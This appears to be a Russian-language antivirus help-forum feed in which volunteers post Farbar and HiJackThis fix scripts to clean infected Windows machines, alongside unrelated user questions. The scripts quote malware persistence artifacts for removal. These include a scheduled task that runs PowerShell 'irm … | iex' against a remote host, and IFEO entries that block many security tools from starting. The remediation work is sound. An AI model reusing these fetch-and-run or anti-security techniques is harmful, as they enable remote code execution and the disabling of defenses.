Активность

Fixlog.txt

Значит не фиксили, невнимательно прочитав инструкцию по ссылке. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center: Ограничение <==== ВНИМАНИЕ Policies: C:\ProgramData\NTUSER.pol: Ограничение <==== ВНИМАНИЕ HKLM\SOFTWARE\Policies\Microsoft\Edge: Ограничение <==== ВНИМАНИЕ Task: {2D58B9DF-064F-4C72-8BDD-21A76826D5BD} - System32\Tasks\Microsoft\Office\Office Background Push Maintenance => C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonx86\Microsoft Shared\Office16\opushutil.exe /pushregistration (Нет файла) Task: {0CEC0B91-4AE9-4E8A-ACB2-3B4C811F442C} - System32\Tasks\Microsoft\Windows\WaaSMedic\PerformRemediation => {72566E27-1ABB-4EB3-B4F0-EB431CB1CB32} %systemroot%\system32\WaasMedicSvc.dll (Нет файла) ProxyServer: [S-1-5-21-934220822-1114785592-3784654764-1001] => hxxp://127.0.0.1:8888 HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ограничение <==== ВНИМАНИЕ S3 QHProtected; отсутствует ImagePath S2 SurfEasyVPN; отсутствует ImagePath S3 WinDivert; \??\C:\Users\User\Desktop\Новая папка (2)\bin\WinDivert64.sys [X] 2025-07-20 23:54 - 2025-07-20 23:54 - 000000258 __RSH C:\ProgramData\ntuser.pol ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Нет файла ContextMenuHandlers4: [360Zip] -> {9179176E-B763-3200-8500-BB1B90B3D5DE} => -> Нет файла ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Нет файла ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Нет файла AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2456] AlternateDataStreams: C:\Users\User\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394] AlternateDataStreams: C:\Users\User\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394] FirewallRules: [UDP Query User{9AC796A4-B45D-44A5-824E-545EA670C715}C:\program files\java\jre1.8.0_261\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_261\bin\javaw.exe => Нет файла FirewallRules: [TCP Query User{AC143AF7-0BB0-4A2F-B43B-B96C1CFFC25E}C:\program files\java\jre1.8.0_261\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_261\bin\javaw.exe => Нет файла FirewallRules: [UDP Query User{BA8D2D7E-0DA9-44AB-9D98-EB23DB9CC699}C:\program files\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_261\bin\javaw.exe => Нет файла FirewallRules: [TCP Query User{54F5708F-EAB8-4614-B121-0D2E48C2435F}C:\program files\java\jre1.8.0_261\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_261\bin\javaw.exe => Нет файла FirewallRules: [{27DCB01C-E2EE-487E-9D59-25FC741D62AC}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{73A03E2F-7BE7-43E0-A209-F24D611EFDB4}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{721B8C94-1924-45DD-BBA6-5BAB21464063}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{2770C37A-9FA4-49A6-BAD5-C58B4ABF1A0A}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{DD3E6243-D22C-4A24-B986-7D63F20868A9}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{5639703B-7AB6-4062-ABB4-B8D0A666C7A3}] => (Allow) C:\Users\User\AppData\Roaming\Tencent\TxGameAssistant\GameDownload\TenioDL.exe => Нет файла FirewallRules: [{8284DCEA-7F64-407E-9E84-2FB250ABD178}] => (Allow) c:\program files\txgameassistant\ui\TxGaDcc.exe => Нет файла FirewallRules: [{5C0121A4-0F69-4ED7-AE67-36F587BDE2D0}] => (Allow) c:\program files\txgameassistant\ui\bugreport.exe => Нет файла FirewallRules: [{26E2E9EB-AF85-44FD-84C0-059E2153D15C}] => (Allow) c:\program files\txgameassistant\ui\TInst.exe => Нет файла FirewallRules: [{023C8B6D-B945-47B9-87F8-61242124F483}] => (Allow) c:\program files\txgameassistant\ui\adb.exe => Нет файла FirewallRules: [{93DDF791-0935-4689-BECF-74638ACC23C7}] => (Allow) c:\program files\txgameassistant\ui\AndroidEmulator.exe => Нет файла FirewallRules: [{03B1C4C4-31AD-430B-9952-2AC4689EFA18}] => (Allow) c:\program files\txgameassistant\appmarket\GF186\TUpdate.exe => Нет файла FirewallRules: [{A64EF40E-7DD4-4273-AABB-621A7AFE6918}] => (Allow) c:\program files\txgameassistant\appmarket\GameDownload.exe => Нет файла FirewallRules: [{D4AC8944-D95C-4193-884A-40C1A86D1B00}] => (Allow) c:\program files\txgameassistant\appmarket\QQExternal.exe => Нет файла FirewallRules: [{28B96780-1CD7-4455-BD09-BA46BCE3D1D1}] => (Allow) c:\program files\txgameassistant\appmarket\bugreport.exe => Нет файла FirewallRules: [{6023E28D-CDE4-4807-B89B-6A714C60581A}] => (Allow) c:\program files\txgameassistant\appmarket\TInst.exe => Нет файла FirewallRules: [{0085C32D-96F0-4B91-B7DE-97B8F5CA91F5}] => (Allow) c:\program files\txgameassistant\appmarket\AppMarket.exe => Нет файла FirewallRules: [TCP Query User{9E4444AB-64A1-44DF-82D2-14C44A2120A4}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{CEB47CF6-C360-4FC0-A153-EDEE81E2EDAB}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Нет файла FirewallRules: [TCP Query User{B1A31E0D-64B6-4744-A502-7CF2959F511F}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Нет файла FirewallRules: [UDP Query User{437075B6-0DA0-4630-9E85-BF7023605099}C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe] => (Allow) C:\program files\epic games\fortnite\fortnitegame\binaries\win64\fortniteclient-win64-shipping.exe => Нет файла FirewallRules: [TCP Query User{376FFE05-B963-45D6-96B8-D86534D36A1D}C:\programdata\wargaming.net\gamecenter\wgc.exe] => (Allow) C:\programdata\wargaming.net\gamecenter\wgc.exe => Нет файла FirewallRules: [UDP Query User{E4D2743D-2F8A-4431-9CA0-3D369E4223E0}C:\programdata\wargaming.net\gamecenter\wgc.exe] => (Allow) C:\programdata\wargaming.net\gamecenter\wgc.exe => Нет файла FirewallRules: [{505C4C1A-2B32-46B4-9F77-6BFF1D9EF127}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe => Нет файла FirewallRules: [{3B387652-1647-4A90-A148-D53F40BA6A19}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Metro Last Light\MetroLL.exe => Нет файла FirewallRules: [TCP Query User{C7A04238-222B-47C7-8112-377989262063}C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe => Нет файла FirewallRules: [UDP Query User{CEDAD3B6-3CF4-4EAE-B173-046235DF74B0}C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe => Нет файла FirewallRules: [TCP Query User{560FC94D-F301-475B-AA49-6EE5DCE99E0E}C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe => Нет файла FirewallRules: [UDP Query User{9C7E00A3-7083-4A1E-AB67-61102C35093A}C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe] => (Allow) C:\users\user\appdata\roaming\.tlauncher\starter\jre_default\jre-21.0.61-windows-x64\bin\java.exe => Нет файла FirewallRules: [TCP Query User{1F87C095-98E9-45C4-9C81-8ABA30FBF3E4}C:\users\user\appdata\local\faceit\app-2.0.48\faceit.exe] => (Allow) C:\users\user\appdata\local\faceit\app-2.0.48\faceit.exe => Нет файла FirewallRules: [UDP Query User{1E90BA61-053A-4D5B-B7B7-FCAF888D8D80}C:\users\user\appdata\local\faceit\app-2.0.48\faceit.exe] => (Allow) C:\users\user\appdata\local\faceit\app-2.0.48\faceit.exe => Нет файла FirewallRules: [TCP Query User{2051008C-9331-4682-9B9A-BA0A1240646E}C:\users\user\appdata\local\faceit\app-2.1.13\faceit.exe] => (Allow) C:\users\user\appdata\local\faceit\app-2.1.13\faceit.exe => Нет файла FirewallRules: [UDP Query User{5332523B-4D6D-4EB0-90FB-F1AEBCE477C2}C:\users\user\appdata\local\faceit\app-2.1.13\faceit.exe] => (Allow) C:\users\user\appdata\local\faceit\app-2.1.13\faceit.exe => Нет файла FirewallRules: [TCP Query User{F143859F-70D4-45A5-9CB4-5D0F0C587671}C:\program files (x86)\ufiler\ufiler.exe] => (Allow) C:\program files (x86)\ufiler\ufiler.exe => Нет файла FirewallRules: [UDP Query User{C5B7655D-C09E-4CB8-AC30-7F642EB95899}C:\program files (x86)\ufiler\ufiler.exe] => (Allow) C:\program files (x86)\ufiler\ufiler.exe => Нет файла FirewallRules: [{C1D51DAC-89A5-412F-9813-FBE2A0109FC6}] => (Allow) C:\Program Files (x86)\BlueStacks X\BlueStacksWeb.exe => Нет файла FirewallRules: [{E5A85305-CB55-4075-87B8-55E41F40C9C0}] => (Allow) C:\Program Files (x86)\BlueStacks X\Cloud Game.exe => Нет файла FirewallRules: [TCP Query User{0F9900E2-0C54-4835-81AE-61618704E4C9}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => Нет файла FirewallRules: [UDP Query User{32A491DB-9BF8-4F61-A9A9-C2ADCC6D60F8}C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe => Нет файла Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера.

Здравствуйте. Пофиксите в HiJackThis из папки Autologger (запускать HiJackThis от имени Администратора по правой кнопке мыши) O26 - Debugger (Stack Rumbling): HKLM\..\a2service.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\acnamagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\acnamlogonagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\AnVir.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\anvir64.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\anvirlauncher.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\aswidsagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\autoruns.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\autorunsc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\AvastSvc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\AvastUI.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\AvastUI.p.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\avgnt.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\avgsvc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\avguard.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\AVKService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\avp.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\avpui.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\bcdedit.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\bdagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\bdservicehost.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\BullGuardSvc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\ccSvcHst.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\clientcommunicationservice.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\cmdagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\CybereasonRansomFreeService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\DeepInstinctService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\dism.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\dwservice.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\egui.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\ekrn.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\EPConsole.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\FRST64.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\F-Secure.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\GDataAVK.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\GlassWire.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\GlassWireSetup.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\HeimdalClientHost.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\kldw.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\klwtblfs.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\KVRT.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mbamagent.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mbamservice.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mbamtray.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mcshield.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\MediaCreationTool22H2.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mfeesp.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mfetp.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mmc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\mstsc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\n360.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\nortonsecurity.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\ntrtscan.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\OpenHardwareMonitor.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\panda_url_filtering.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\pavfnsvr.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\pavsrv.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\pccntmon.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\PowerTool.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\PowerTool64.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\PSANHost.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\PSUAService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\ReAgentc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\recoverydrive.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\regedit.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\rstrui.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\SAVAdminService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\SAVService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\SBAMSvc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\SecureAPlus.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\shstat.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\Smc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\sophosav.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\sophosclean.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\sophoshealth.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\sophossps.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\sophosui.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\systemreset.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\SystemSettingsAdminFlows.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\tcpview.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\tcpview64.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\TMASOAgent.exe.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\TrustwaveService.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\V3Svc.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\VirusTotalUpload.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\vssadmin.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\vsserv.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\Wireshark.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\WRSA.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\wuapihost.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\wuauclt.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\x32dbg.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\x64dbg.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\xcopy.exe: [MinimumStackCommitInBytes] = 0x41888887 O26 - Debugger (Stack Rumbling): HKLM\..\ZAPrivacyService.exe: [MinimumStackCommitInBytes] = 0x41888887 Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Только службы системные возможно и остались поврежденными. Поэтому лучше выполните то, о чем просят.

CollectionLog-2025.07.21-18.44.zip Сообщение от модератора Mark D. Pearlstone Темы объединены.

Порядок оформления запроса о помощи

Тут у меня ничего такого нет?

Это у всех браузеров так, панель закладок снизу, а справа от адресной строки только значки расширений.

Поздравляю!

как говорится - так задумано

к сожалению нет

Здравствуйте! Какие антивирусы? Отчёты удаления остались? Соберите стандартный комплект логов по правилам - Порядок оформления запроса о помощи

почитал у других пользователей с той же проблемой и решил сделать что там говорят вот файлы Addition.txt FRST.txt

нашел сегодня вирус по пути C:\programdata\google\chrome, сам гугл не разу не устанавливал, антивирусы пытались удалить не один десяток раз, не увенчалось успехом, я пытался удалить вручную, папка вернулась на место, внутри пусто, антивирусы находя какие то файлы по типу updater.exe и другие, пытался открыть с помощью far manager, он тоже ничего не нашел, как только открываю диспетчер процессор с 40-70% падает на 5-20% (просмотрено по msi afterburner), подскажите что делать, заранее спасибо

Здравствуйте, напишите, пожалуйста в техподдержку по контактам https://support.kaspersky.ru/b2b/ru

Addition.txtFRST.txt

Здравствуйте, в теме ниже мне помогли удалить вирус с пк. Все работает хорошо, но недавно я заметил просадки фпс в CS 2. Ранее никаких просадок фпс не было замечено, но после помощи с вирусом стал иногда замечать сильные просадки фпс с 144 до 80-100. Есть парочка записей с просадками фпс и более менее стабильном 144 в одном и том же матче. Если заинтерисует, могу скинуть через какой нибудь файлообменник архив

Позвонили с номера +74992704007 либо +74992704007@mangosip.ru уточнили использую ли я касперский после слов что я его тестирую сказали хорошо до свидания причем звонок на рабочий телефон спрашивали ИТ спеца?? данный телефон ный номер как то связан с Касперским??

То есть злоумышленники, подобрав пароль прямо на сервер заходят?

Антивирус то защитит, но надо еще и антивирус защитить. :). Чтобы его не отключили злоумышленники после получения доступа на устройство. Поэтому необходима комплексная защита: от проникновения и запуска вредоносных программ. По выбору продукта для сервера лучше уточните в Технической поддержке какой вам подойдет.

Подскажите, пожалуйста, ваш антивирус защитит от проникновения шифровальщика? Посоветуйте что приобрести для сервера?

Файловая система никак не связана с типом диска. Если это Windows, то в 99,9% файловая система будет NTFS на любом стационарном диске. В любом случае в пределах однотипной операционной системы (например любая версия Windows) при переносе данных не имеет значения какая файловая система на диске.

Здравствуйте. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: HKLM\...\Run: [CAA Service] => C:\ProgramData\CAAService\CAAServices.exe (Нет файла) Task: {5A611B79-55B4-4E61-BF10-E056850633C2} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ Task: {F3E6E7ED-A196-4E44-8803-55FAB3AD4E29} - System32\Tasks\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker => %systemroot%\system32\MusNotification.exe (Нет файла) Folder: C:\ProgramData\CAAService 2025-07-19 01:27 - 2025-07-19 01:57 - 000000000 ____D C:\ProgramData\CAAService FirewallRules: [{aa9a8062-fb22-4510-be21-0dbe26e8598d}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{56e01aad-2709-49f1-b029-c3e5f5c5494e}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{454e207d-542c-47f9-94ea-cd58f66d7756}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f4eaacfd-6b8f-4145-b697-6a46085da34b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{0d13204a-8c8d-444a-a517-620c0705a12b}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{752ca4cc-7a11-457c-8686-dfe3db5d9fee}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{2b1d893f-1357-495b-9e67-a2eae1db27bd}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{1edc3c4e-dfc2-4576-a6dc-7424003c2032}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{099255c8-c4bf-476e-b69f-836716d70fd0}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{e8cb1544-6ec8-4df2-ae31-8027b3995c0a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{840c6b1f-7635-4c45-88bc-f616e29ef7cf}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{71f2e40a-3c7f-4319-befc-f64147857391}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{f6623a94-cb98-4e82-a385-16a498ebc0f6}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла FirewallRules: [{fc1329f8-41df-464c-a710-f20bfdf2914a}] => (Allow) C:\ProgramData\CAAService\CAAServices.exe => Нет файла Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера.

это лишнее. 1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать) Start:: CreateRestorePoint: StartPowershell: Remove-MpPreference -ExclusionPath "C:\Program Files\RDP Wrapper" EndPowerShell: Reboot: End:: 2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши. 3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении. Обратите внимание: будет выполнена перезагрузка компьютера. Загрузите SecurityCheck by glax24 & Severnyj и сохраните архив на Рабочем столе. Разархивируйте, запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10/11);Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;Прикрепите этот файл в своем следующем сообщении.